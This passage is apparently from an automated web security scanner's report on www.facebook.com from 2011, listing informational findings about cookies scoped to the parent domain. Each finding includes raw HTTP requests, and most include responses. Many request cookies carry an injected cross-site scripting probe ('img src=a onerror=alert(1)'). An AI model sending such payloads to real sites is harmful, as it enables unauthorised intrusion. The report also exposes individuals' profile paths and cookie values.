<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.42. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; made_write_conn=1304595678; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; W=1304595678

Response

10.43. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.44. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.77
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 0

10.45. http://www.facebook.com/izaOllie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/izaOllie

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.46. http://www.facebook.com/jezzas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/jezzas

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.47. http://www.facebook.com/kimberly.christ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/kimberly.christ

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.48. http://www.facebook.com/ladonna.lokey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ladonna.lokey

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.49. http://www.facebook.com/lakendra.roberts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/lakendra.roberts

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.50. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

10.51. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
_e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D; wd=1022x1007

Response

10.52. http://www.facebook.com/mapquest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mapquest

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapquest HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/MapQuest
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.49
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 0

10.53. http://www.facebook.com/matthew.oliveira2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/matthew.oliveira2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.54. http://www.facebook.com/mmafighting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mmafighting

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.55. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
